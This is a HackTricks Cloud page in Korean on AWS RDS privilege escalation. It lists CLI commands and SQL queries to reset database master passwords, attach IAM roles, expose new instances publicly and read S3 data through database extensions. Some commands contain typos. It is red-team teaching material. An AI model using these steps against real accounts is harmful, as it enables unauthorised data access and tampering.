AWS - RDS Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

구독 플랜을 확인하세요!
**💬 Discord 그룹 또는 telegram 그룹에 가입하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
PR을 제출하여 해킹 트릭을 공유하세요 HackTricks 및 HackTricks Cloud github 저장소에.

RDS - Relational Database Service

RDS에 대한 자세한 정보는 다음을 확인하세요:

AWS - Relational Database (RDS) Enum

`rds:ModifyDBInstance`

이 권한을 사용하면 공격자는 마스터 사용자의 비밀번호를 수정하고 데이터베이스에 로그인할 수 있습니다:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

데이터베이스에 연결할 수 있어야 합니다 (일반적으로 내부 네트워크에서만 접근 가능합니다).

잠재적 영향: 데이터베이스 내의 민감한 정보를 찾습니다.

rds-db:connect

문서에 따르면 이 권한을 가진 사용자는 DB 인스턴스에 연결할 수 있습니다.

RDS Role IAM 권한 남용

Postgresql (Aurora)

**SELECT datname FROM pg_database;**를 실행하여 **rdsadmin**이라는 데이터베이스를 찾으면 AWS postgresql 데이터베이스 안에 있다는 것을 알 수 있습니다.

먼저 이 데이터베이스가 다른 AWS 서비스에 접근하는 데 사용되었는지 확인할 수 있습니다. 설치된 확장을 확인하여 이를 확인할 수 있습니다:

SELECT * FROM pg_extension;

만약 **aws_s3**와 같은 것을 발견하면 이 데이터베이스가 S3에 대한 어떤 종류의 접근 권한을 가지고 있다고 가정할 수 있습니다 (다른 확장으로는 aws_ml 및 aws_lambda 등이 있습니다).

또한, aws rds describe-db-clusters 명령을 실행할 수 있는 권한이 있다면 클러스터에 IAM Role이 연결되어 있는지 AssociatedRoles 필드에서 확인할 수 있습니다. 만약 연결되어 있다면, 데이터베이스가 다른 AWS 서비스에 접근할 수 있도록 준비되었다고 가정할 수 있습니다. 역할의 이름을 기반으로 (또는 역할의 권한을 얻을 수 있다면) 데이터베이스가 어떤 추가 접근 권한을 가지고 있는지 추측할 수 있습니다.

이제 버킷 내부의 파일을 읽기 위해서는 전체 경로를 알아야 합니다. 다음과 같이 읽을 수 있습니다:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

If you had **raw AWS credentials** you could also use them to access S3 data with:

**raw AWS credentials**가 있다면 다음을 사용하여 S3 데이터에 접근할 수도 있습니다:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Postgresql은 S3에 접근하기 위해 어떤 파라미터 그룹 변수도 변경할 필요가 없습니다.

Mysql (Aurora)

mysql 내부에서 SELECT User, Host FROM mysql.user; 쿼리를 실행하고 **rdsadmin**이라는 사용자가 있으면, AWS RDS mysql db 안에 있다고 가정할 수 있습니다.

mysql 내부에서 **show variables;**를 실행하고 aws_default_s3_role, aurora_load_from_s3_role, **aurora_select_into_s3_role**와 같은 변수에 값이 있으면, 데이터베이스가 S3 데이터를 접근할 준비가 되어 있다고 가정할 수 있습니다.

또한, **aws rds describe-db-clusters**를 실행할 권한이 있으면 클러스터에 연관된 역할이 있는지 확인할 수 있습니다. 이는 보통 AWS 서비스에 대한 접근을 의미합니다.

이제 버킷 내부의 파일을 읽으려면 전체 경로를 알아야 합니다. 다음과 같이 읽을 수 있습니다:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

`rds:AddRoleToDBCluster`, `iam:PassRole`

rds:AddRoleToDBCluster와 iam:PassRole 권한을 가진 공격자는 지정된 역할을 기존 RDS 인스턴스에 추가할 수 있습니다. 이는 공격자가 민감한 데이터에 접근하거나 인스턴스 내 데이터를 수정할 수 있게 할 수 있습니다.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potential Impact: RDS 인스턴스의 민감한 데이터에 접근하거나 데이터의 무단 수정. 일부 DB는 Mysql과 같이 추가 구성이 필요하며, 이는 파라미터 그룹에서 역할 ARN을 지정해야 합니다.

`rds:CreateDBInstance`

이 권한만으로도 공격자는 이미 존재하는 클러스터 내에 새로운 인스턴스를 생성할 수 있으며, 이 클러스터에는 IAM 역할이 연결되어 있습니다. 공격자는 마스터 사용자 비밀번호를 변경할 수는 없지만, 새로운 데이터베이스 인스턴스를 인터넷에 노출시킬 수 있습니다:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

`rds:CreateDBInstance`, `iam:PassRole`

TODO: Test

rds:CreateDBInstance와 iam:PassRole 권한을 가진 공격자는 지정된 역할이 부여된 새로운 RDS 인스턴스를 생성할 수 있습니다. 그런 다음 공격자는 잠재적으로 민감한 데이터에 접근하거나 인스턴스 내의 데이터를 수정할 수 있습니다.

첨부할 역할/인스턴스 프로필의 몇 가지 요구 사항 (출처: 여기):

프로필은 계정에 존재해야 합니다.
프로필은 Amazon EC2가 가정할 수 있는 IAM 역할을 가져야 합니다.
인스턴스 프로필 이름과 관련된 IAM 역할 이름은 접두사 AWSRDSCustom으로 시작해야 합니다.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Potential Impact: RDS 인스턴스의 민감한 데이터에 접근하거나 데이터를 무단으로 수정할 수 있습니다.

`rds:AddRoleToDBInstance`, `iam:PassRole`

rds:AddRoleToDBInstance와 iam:PassRole 권한을 가진 공격자는 지정된 역할을 기존 RDS 인스턴스에 추가할 수 있습니다. 이는 공격자가 민감한 데이터에 접근하거나 인스턴스 내의 데이터를 수정할 수 있게 할 수 있습니다.

DB 인스턴스는 클러스터 외부에 있어야 합니다

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Potential Impact: RDS 인스턴스의 민감한 데이터에 접근하거나 데이터의 무단 수정.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

구독 플랜을 확인하세요!
💬 Discord 그룹 또는 telegram 그룹에 가입하거나 Twitter 🐦 @hacktricks_live을 팔로우하세요.
PR을 제출하여 HackTricks 및 HackTricks Cloud github 저장소에 해킹 트릭을 공유하세요.

PreviousAWS - MSK Privesc NextAWS - Redshift Privesc

Last updated 1 month ago

RDS - Relational Database Service

rds:ModifyDBInstance

rds-db:connect

RDS Role IAM 권한 남용

Postgresql (Aurora)

Mysql (Aurora)

rds:AddRoleToDBCluster, iam:PassRole

rds:CreateDBInstance

rds:CreateDBInstance, iam:PassRole

rds:AddRoleToDBInstance, iam:PassRole

`rds:ModifyDBInstance`

`rds:AddRoleToDBCluster`, `iam:PassRole`

`rds:CreateDBInstance`

`rds:CreateDBInstance`, `iam:PassRole`

`rds:AddRoleToDBInstance`, `iam:PassRole`